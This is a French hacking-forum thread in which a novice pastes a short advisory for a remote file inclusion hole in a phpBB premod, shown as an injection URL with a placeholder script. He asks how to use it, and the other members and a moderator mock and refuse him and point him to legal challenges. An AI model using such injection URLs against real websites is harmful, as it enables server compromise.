[Macro Hack]

salut

j'ai trouvé une faille dans un site qui concerne un phpbb premodé

Code:

Exploit: 
~~~~~~ 
Variable $phpbb_root_path not sanitized.When register_globals=on an attacker ca 
n exploit this vulnerability with a simple php injection script. 

# http://www.site.com/[path]/includes/functions_portal.php?phpbb_root_path=[Evi 
l_Script] 
---------------------------------------------------------------------------

la voici, et j'ai voulu savoir il fait qauoi cette faille ? comment l'aplliquer ?

j'ai deja installé cette version premodé et je voudrais appliquer une faille pour voir qu'est ce que ça donnera mais sans votre aide je vais pas arriver

et puis voila, @+

[Zmx]

c'est marrant la reponse est ecrite dans la question ...


Pour repondre simplement je dirais:
1a) apprendre l'anglais
1b) apprendre à lire
2) comprendre ...

[Macro Hack]

salut

desolé mais je suis noob dans le hack, et en plus je pige rien en english .

merci pour ta reponse quand meme

[zours]

Mouais... On va dire que l'anglais tu risques d'en avoir un poil besoin, quand même. C'est marrant comme plein de doc reste en anglais et non-traduite. Donc si tu veux la comprendre, pas le choix.

*snif snif * !!!!!!!

[shiroko]

Hum cette faille est des plus basiques, donc avant de vouloir haxoriser du phpBB, je te conseil de lire des tutos de sécurité sur le langage PHP.

Ensuite, çà coulera de source lol

[Macro Hack]

euh meme en traduisant j'ai pas pigé

est ce qu'il faut ajouter includes/functions_portal.php?phpbb_root_path=%20[l_Script%20d'Evi] devant l'adresse du forum ?



ça m'a donné

ACCES INTERDIT
L'accès au fichier requiert une autorisation.

[shiroko]

Lol, c'est balo hein

Va voir un peu ce qu'ils te disent sur les erreurs envoyées par un serveur WEB, va voir des articles de sécu PHP, et ENSUITE re-test SUR TON SITE

[Macro Hack]

j'ai pas compris

le dossier est secrusé par htacces , donc comment hacker et bien servire de cette faille

quelqu'un peut me donner les etapes svp

[shiroko]

Je viens de te les donner les étapes

[zours]

Non mais Macro Hack, c'est pas la peine d'espérer qu'on va te guider en step by step pour hacker des forums...
De toute façon pour t'amuser y'a déjà les épreuves de hacking ici.

Bon faut que j'aille arrêter mon lameromètre, il siffle depuis tout à l'heure.

*snif snif * !!!!!!!!

[Nms]

Le mien a explosé depuis bien longtemps...

[Nebelmann]

Je vous décompresse un peu...

Allons-y pour un avertissement : tu n'es pas le premier (j'espère que tu seras le dernier ), et on commence à être lassés de voir des gars comme toi sortir un tas d'inepties, qui croient que hacker c'est utiliser un script mal foutu, ou récupérer un mot de passe MSN ou Skyblog. On n'est pas là pour faire l'apprentissage à ta place, on propose des challenges qui permettent à ceux qui le font d'avoir une première approche des failles les plus connues, de savoir les reconnaître et les exploiter. Si tu veux commencer, commence par là et pas par une faille inconnue et non documentée, avec un PoC condensé à mort pour tenir sur 1337 octets. Apprend l'anglais et le français en même temps, ça pourra t'être utile...

Encore un post dans le même genre, et ça sera le ban du forum. On l'a déjà fait, et on en est pleinement satisfaits.

À bon entendeur, salut. Et bonne année.

[Mic32768]

Bah, moi je trouve ça drôle, ça met de la vie dans le forum Comme dans le temps de Charlesqueen

[the lsd]

Ahhh la la... Charlesqueen ! Il me manquerait presque... Nan j'déconne

Pour en revenir au sujet de base, Macro Hack, tu as quand meme dépasser les bornes des limites... Trois topic dans la journée, pour dire pas grand chose d'interresant, dont deux fermé maintenant... Je me range du coté de Nebelmann pour t'avertir, et te dire de te calmer un peu... Le but du jeu c'est d'apprendre a se servir d'un ordi, pas qu'on te montre sans que tu conprenne rien hein ! donc direction google, -> apprendre html et apres google -> apprendre PHP, apres quand tu reviendra, tu verras que tes 3 topic ils sont inutiles et ininterressants...
Sur ce...

Enjoy

The lsd

[CommComm]

tu as quand meme dépasser les bornes des limites...

Voire dépassé les limites des bornes.